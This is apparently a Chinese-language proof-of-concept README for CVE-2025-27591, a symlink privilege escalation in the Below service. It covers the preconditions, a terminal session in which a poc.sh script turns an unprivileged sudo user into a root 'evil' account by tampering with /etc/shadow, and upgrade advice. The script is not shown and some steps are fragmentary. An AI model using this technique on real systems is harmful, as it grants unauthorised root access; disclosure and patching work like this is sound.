CVE-2025-27591 的概念验证,该漏洞允许本地非特权用户通过符号链接攻击将权限提升至 root。
该漏洞影响 Below 服务(v0.9.0 之前的版本)。该服务创建了一个具有全局可写权限(0777)的 /var/log/below 目录,使得本地非特权用户可以移动符号链接并操纵关键文件(如 /etc/shadow),从而提升至 root 权限。
本地非特权用户可通过以下方式提升至 root:
sudo below snapshot),导致 Below 以 root 权限写入该符号链接。/var/log/below/ 必须具有全局可写权限(0777)且包含 error_root.log 文件。sudo /usr/bin/below。foo@victim:~$ ls -l /var/log/ | grep below
drwxrwxrwx 3 root root 4096 Jul 8 20:45 below
我们需要在 sudoers 级别拥有权限。
foo@victim:~$ sudo -l
Matching Defaults entries for jacob on victim:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User foo may run the following commands on victim:
(ALL : ALL) NOPASSWD: /usr/bin/below
一旦我们有了 poc.sh 文件,就赋予其必要的权限,执行它,我们就会成为 root。
foo@victim:/tmp$ chmod +x poc.sh
foo@victim:/tmp$ ./poc.sh
evil@victim:/tmp# id
uid=0(evil) gid=0(root) groups=0(root)
升级到 Below v0.9.0 或更高版本,该版本移除了不安全的 chmod 逻辑,并依赖 systemd 单元特性(如 LogsDirectory=below)。